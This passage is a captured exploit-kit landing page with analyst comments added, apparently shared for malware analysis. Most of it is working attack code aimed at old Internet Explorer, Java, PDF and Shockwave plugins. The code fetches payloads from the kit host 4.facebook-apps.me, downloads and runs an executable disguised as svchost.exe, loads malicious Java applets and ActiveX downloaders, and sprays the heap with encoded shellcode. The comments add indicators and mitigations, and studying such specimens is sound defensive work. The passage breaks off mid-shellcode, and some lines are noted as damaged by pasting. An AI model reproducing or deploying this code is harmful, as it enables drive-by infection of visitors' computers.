// path "./svchost.exe" (overwriting), and then calls shellexecute on it.
// Every step is wrapped in an empty catch, so failures are silent and spl6()
// runs regardless. Note that shellexecute is attempted even when the download
// block threw.
// Host-side indicator: a file named svchost.exe created outside the Windows
// system directory by a browser process.
function spl4() {
    var ra4 = "./svchost.exe",
        ra3 = document.createElement("object");
    ra3.setAttribute("id", ra3); // id is set to the element itself (stringified)
    ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    try {
        var ra0 = ra3.CreateObject("adodb.stream", ""),
            ra1 = ra3.CreateObject("Shell.Application", ""),
            ra2 = ra3.CreateObject("msxml2.XMLHTTP", "");
        try {
            ra2.open("GET", "http://4.facebook-apps.me/panel/load.php?spl=XMLHTTP", false);
            ra2.send();
            ra0.type = 1; // ADODB.Stream type 1: binary
            ra0.open();
            ra0.Write(ra2.responseBody);
            ra0.SaveToFile(ra4, 2); // option 2: overwrite an existing file
            ra0.Close();
        } catch (e) {}
        try {
            ra1.shellexecute(ra4);
        } catch (e) {}
    } catch (e) {}
    spl6()
}

// Last stage of the spl chain: appends a zero-sized iframe loading hcp_asx.php
// from the kit host, ignoring any error. `m` is assigned without `var`, so it
// becomes a global.
function spl6() {
    try {
                m = document.createElement('IFRAME');
                m.setAttribute('src', 'http://4.facebook-apps.me/panel/hcp_asx.php');
                m.setAttribute('width', 0);

                m.setAttribute('height', 0);
                document.body.appendChild(m)

    } catch (e) {}
}
spl0()

</script>
<applet width="900" height="800"><param name="code" value="http://3286924353/I6F3G4N7.jar"><param name="codebase" value="file:C:\Program Files\java\jre6\lib\ext"><param name="foreground" value="http://4.facebook-apps.me/panel/load.php?spl=jre6"></applet>
<APPLET CODE="Gallery_Viewer.class" ARCHIVE="Gallery_Viewer.jar" WIDTH="1" HEIGHT="1"><PARAM NAME="URL_CODE" VALUE="http://4.facebook-apps.me/panel/load.php?spl=Silend_galery"></APPLET>
<applet width='1' height='1' code='I6F3G4N7.class' archive='I6F3G4N7.jar'>
<param name="transition_delay" value="0">
<param name="delay" value="2000">
<param name="step_count" value="0">
<param name="mode" value="0">
<param name="image_align" value="center">
<param name="image_valign" value="center">
</applet>
<applet code="Main.class" archive="signedapplet.jar" width="1" height="1" >
<param name="fileName" value="MyFile.jar">
<param name="url" value="http://4.facebook-apps.me/panel/load.php?spl=turk_signedapplet">
</applet>
<applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">
<param name='file' value="http://4.facebook-apps.me/panel/load.php?spl=Sun_Microsystems">
</applet>
<Applet Code="MSFcmd.class" archive="MSFcmd.jar" width="1" Height="1">
<PARAM NAME="FileName" VALUE="update.exe">
<PARAM NAME="URL" VALUE="http://4.facebook-apps.me/panel/load.php?spl=MSFcmd">
</applet>
<applet archive="http://4.facebook-apps.me/panel/java/java.jar" code="GetAccess.class" width=1   height=1><param name="ModulePath" value="http://4.facebook-apps.me/panel/load.php?spl=GetAccess"></applet>
<applet archive="SiteLoader.jar" code="SiteLoader.class" height="1" width="1"></applet>
<applet archive="Exploit.jar" code="vuln.Exploit.class" height="1" width="1"></applet>
<script language=javascript>
// Analyst note: another Java Deployment Toolkit launch() call. It creates an
// <object> with CLSID CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA, switches to the
// npruntime DeploymentToolkit MIME type when the browser name does not start
// with "MICRO", appends it and calls launch() with a "-J-XXaltjvm=" option
// pointing at a \webdav\ path on the kit host.
// NOTE(review): `navig! = 'MICRO'` is not valid JavaScript as printed, so this
// script block would fail to parse; most likely a deobfuscation or paste
// artefact of `!=`. The listing is kept exactly as posted.
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\4.facebook-apps.me\webdav\index.php");
</script>

<script>
// Analyst note: PDF dispatcher. Writes an <OBJECT id=jdf1> with CLSID
// CA8A9780-280D-11CF-A24D-444553540000, reads its GetVersions() string and
// keeps the value after "=" in the second comma-separated entry.
// The range test compares strings, not numbers, so ordering is lexicographic
// ("10.0.0" would sort below "8.0.0"). Versions inside 8.0.0-8.3.0 or
// 9.0.0-9.3.0 get an iframe to npdf.php; everything else gets old_pdf.php,
// so every visitor with the control receives one of the two PDF pages.
document.write("<OBJECT id=jdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");
    var ver = jdf1.GetVersions();
    ver = ver.split(",");
ver = ver[1].split("=");
ver = ver[1];

if((ver >= "8.0.0") && (ver <="8.3.0") || (ver >= "9.0.0") && (ver <="9.3.0"))
{
document.write('<iframe src="http://4.facebook-apps.me/panel/npdf.php" width="349" height="258" frameborder="0"></iframe>');
}
else
{
document.write('<iframe src="http://4.facebook-apps.me/panel/old_pdf.php" width="59" height="407" frameborder="0"></iframe>');
}
</script><object id="MediaPlayer1" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows® Media Player components..." type="application/x-oleobject" width="280" height="256">
<param name="http://4.facebook-apps.me/panel/Ledi_Gaga.m3u">
<param name="animationatStart" value="true">
<param name="transparentatStart" value="true">
<param name="autoStart" value="true">
<param name="showControls" value="true">
<param name="Volume" value="-450">
<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="http://4.facebook-apps.me/panel/Ledi_Gaga.m3u" name="MediaPlayer1" width=1 height=1 autostart=1 showcontrols=1 volume=-450>
</object> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://4.facebook-apps.me/panel/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://4.facebook-apps.me/panel/load.php?spl=AX_cab">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>        <html>
<body>
<script language='javascript'>
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u2240%u9ff8");
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) { memory[index] = retSlide + shellcode; }
}
var shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2F3A%u342F%u662E%u6361%u6265%u6F6F%u2D6B%u7061%u7370%u6D2E%u2F65
%u6170%u656E%u2F6C%u6F6C%u6461%u702E%u7068%u9000");
sprayHeap(shellcode, 1551747536, 0x400000 - (shellcode.length + 0x38));
document.write("<table style=position:absolute;clip:rect(0)>");

</script>
</body>
</html>
<html><body>
<script>
var zidFtLniBSxvOqsJxtqloszmAzyWgiYTSDyrZBtO = new Array();
var MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS = unescape;
var VgSi = MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%
u0070%u7525%u3437%u3836%u7525%u3037%u3437%u7525%u4632%u4133%u7525%u3433%u4632%u7525%u3636%u4532%u7525%u3336%u3136%u7525%u3236%u3536%u7525%u4636%u4636%u7525%u4432%u4236%u7525%u3037%u3136%u7525%u3337%u3037%u7525%u4436%u4532%u7525%u4632%u3536%u7525%u3136%u3037%u7525%u3536%u4536%u7525%u4632%u4336%u7525%u4636%u4336%u7525%u3436%u3136%u7525%u3037%u4532%u7525%u3037%u3836%u9000');
var eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn = MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS("%u0c0c%u0c0c%u0c0c%u0c0c");
do { eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn += eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn } while( eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn.length < 0x4000 );
for (yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD = 0; yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD < 150; yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD++) zidFtLniBSxvOqsJxtqloszmAzyWgiYTSDyrZBtO[yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD] = eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn + VgSi;
</script>
<object classid='clsid:333C7BC4-460F-11D0-BC04-0080C7055A83'>
<param name='DataURL' value='http://6URKjgXEtNWHqRJYhZUGHlnxKL9A1wqCEQHeUTYNLoLP6BFVZ0DflYlzEoppkkWqIlPRUfALemMUcQRmF5puLTEA5zjDB0LhMr8JqQB6ByKnq4X0oOI0YuJXjaCGTjt3MRrx1uGLHWV242FLJwnQJcHlEL6n8c77H2qSJYV7HyK4Ft4aazQkTwNBJsiXvAupwfKG4DGw1kRGY4ONnwqwJZov3PmEqrM4YfIqqWtsKBT6HuMhh6hnbrM7lwob1DvDYKbZ0Cjsd81mVsI4eSJ0QfCrjJvHWrn7lGkW37Bj5KBa70iZCev4DER1QajyeirxfSNH2oEYhfhY4d3k9nbiwb8GEMKdJgFUnjOxtHQE8JdGHUzlk5csDBUxTXY2fLDSnH1X1TkClfAMqKDyC9ryRIwdUIZhEkdWH2K6RiATZ8Zjp98TjyatQpp9nn74rfluq3RlxsLOOYqs8PsShkOLN3UYB871aIO5DfMLAAoFm7MljGy58Dy32O6qKFYpPHc9mZ5SIIVyCeRvDDxZ8OkXR1qpcZ'/>
</object>
</body></html>
<script>
function MAKEHEAP()
{
try {
document.getElementById('pdfplace').innerHTML = '<div id="divid">%u</div>';
var gg = '!0c0c!0c0c'.replace(/!/g, document.getElementById('divid').innerHTML);
var qq = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7525%u3537%u3532%u7525%u3433%u3733%u7525%u3833%u3633%u7525%u3537%u3532%u7525%u3033%
u3733%u7525%u3433%u3733%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3134%u3333%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3634%u3233%u7525%u3537%u3532%u7525%u3633%u3633%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3333%u3633%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3233%u3633%u7525%u3533%u3633%u7525%u3537%u3532%u7525%u3634%u3633%u7525%u3634%u3633%u7525%u3537%u3532%u7525%u3434%u3233%u7525%u3234%u3633%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3333%u3733%u7525%u3033%u3733%u7525%u3537%u3532%u7525%u3434%u3633%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3533%u3633%u7525%u3537%u3532%u7525%u3133%u3633%u7525%u3033%u3733%u7525%u3537%u3532%u7525%u3533%u3633%u7525%u3534%u3633%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3334%u3633%u7525%u3537%u3532%u7525%u3634%u3633%u7525%u3334%u3633%u7525%u3537%u3532%u7525%u3433%u3633%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3833%u3633%u9000');
var m = new Array();
var r = 0x86000-(qq.length*2);
var n = unescape(gg);while(n.length<r/2) { n+=n; }
var t = n.substring(0,r/2);
delete n;for(i=0; i<270; i++){m[i] = t + t + qq;}
var bdy = document.createElement('body');bdy.addBehavior('#default#userData');
document.appendChild(bdy);try{for (i=0; i<10; i++) {bdy.setAttribute('s',window);} } catch(e){}window.status+='';
} catch(e) { }
}


/**
 * Trigger stub of the captured exploit page (kept verbatim for analysis).
 *
 * Appends a <div id="f"> to the body, fills it with a hidden <button id="atk">
 * whose inline onclick calls MAKEHEAP(), and then calls that handler directly,
 * so no click by the visitor is involved. MAKEHEAP, defined directly above on
 * this page, fills an array with 270 large filler-plus-payload strings, then
 * attaches the '#default#userData' behavior to a script-created <body> element
 * and calls setAttribute('s', window) on it in a loop.
 *
 * Analyst notes:
 * - The whole body sits in try/catch with an empty handler, so a failed run is
 *   silent to the visitor and leaves no script error to notice.
 * - For content inspection, the fixed strings are more useful than the random
 *   identifiers: addBehavior('#default#userData') on a created element together
 *   with setAttribute(..., window), and a display:none button whose handler is
 *   invoked from script.
 * - addBehavior is an Internet Explorer-only API, so this path is aimed at
 *   legacy IE; which flaw it targets is not stated on the page.
 */
function iep()
{
try {
// Container for the hidden button; id 'f' is looked up again two lines down.
var gg=document.createElement('div');
gg.setAttribute('id','f');
document.body.appendChild(gg);
// Hidden button carrying MAKEHEAP() as its inline click handler.
document.getElementById('f').innerHTML="<button id='atk' onclick='MAKEHEAP();' style='display:none'></button>";
// Handler is called from script rather than by a user click.
document.getElementById('atk').onclick();
} catch(e) { }
}

iep();</script><script language="javascript">
// Analyst note (captured specimen, kept verbatim).
// This script hands one string to the launch() method of a Java Deployment
// Toolkit object, reached three different ways depending on the browser.
// The string is not a plain URL: after "http:" it carries a "-J-XXaltjvm="
// switch followed by a path on 4.facebook-apps.me ending in
// webdav\SiteLoader.jar, i.e. the page is trying to pass a JVM option through
// an API that expects a URL.
// NOTE(review): the backslash escapes in this literal look altered by
// deobfuscation or the forum paste; take indicators from the raw capture
// rather than from this listing.
// Indicators visible here: host 4.facebook-apps.me, file name SiteLoader.jar,
// the "webdav" path component, and the launch() argument containing a space
// followed by "-J". On endpoints, a Java launcher command line containing
// -XXaltjvm with a remote path is the matching process-level signal.
// Mitigation is the vendor's Java update and disabling the Deployment Toolkit
// control/plugin in the browser.
var OvOoLotiLdA = "http: -J-XXaltjvm=\\4.facebook-apps.me\webdav\SiteLoader.jar";
if (window.navigator.appName == "Microsoft Internet Explorer") {
// IE branch: the object is created by classid (the Deployment Toolkit ActiveX
// control, to my knowledge; confirm against a CLSID reference) and launch() is
// called without the object being added to the document.
var WGeQegLGysru = document.createElement("OBJECT");
WGeQegLGysru.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
WGeQegLGysru.launch(OvOoLotiLdA);
} else {
// Other browsers: try the NPAPI plugin by its first MIME type ...
try {
var wLkzSSbNB = document.createElement("OBJECT");
wLkzSSbNB.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(wLkzSSbNB);
wLkzSSbNB.launch(OvOoLotiLdA);
} catch (e) {
// ... and fall back to the second MIME type if that throws. This fallback is
// not itself guarded, so an exception here would surface as a script error.
var lbeOpILVQ = document.createElement("OBJECT");
lbeOpILVQ.type = "application/java-deployment-toolkit";
document.body.appendChild(lbeOpILVQ);
lbeOpILVQ.launch(OvOoLotiLdA);
}
}
</script><object type="application/npruntime-scriptable-plugin;deploymenttoolkit"></object><object type="application/java-deployment-toolkit"></object>


<!--
  Analyst note (captured specimen, kept verbatim).
  This element loads a Director movie, GhzrycqVh.DIR, through both an ActiveX
  object and an embed fallback of type application/x-director; the pluginspage
  attribute points at the Shockwave download page. The .DIR file is not part of
  this listing, so the flaw it targets cannot be determined from the page.
  NOTE(review): the classid appears to be the Shockwave Player ActiveX control,
  and ID=Abysssec suggests the markup was lifted from a published
  proof-of-concept; confirm both before relying on them.
  The swRemote value contains unescaped nested single quotes, so a parser will
  end the attribute early; expect tools to disagree on the attribute list.
  The script that follows this element fills an array with 200 large
  filler-plus-payload strings.
  Detection ideas: a randomly named .DIR file requested from the same host as
  the landing page, and this classid or MIME type appearing next to a heap-fill
  script. Removing or updating the Shockwave plugin closes this path.
-->
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
 ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=src value='GhzrycqVh.DIR'>
<param name=swRemote value='swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' '>
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src='GhzrycqVh.DIR' bgColor=#FFFFFF  width=600 height=430 swRemote='swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ' swStretchStyle=fill
 type='application/x-director' PlayerVersion=11 pluginspage='http://www.macromedia.com/shockwave/download/'></embed>
</object>

<script>
shellcode = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u34
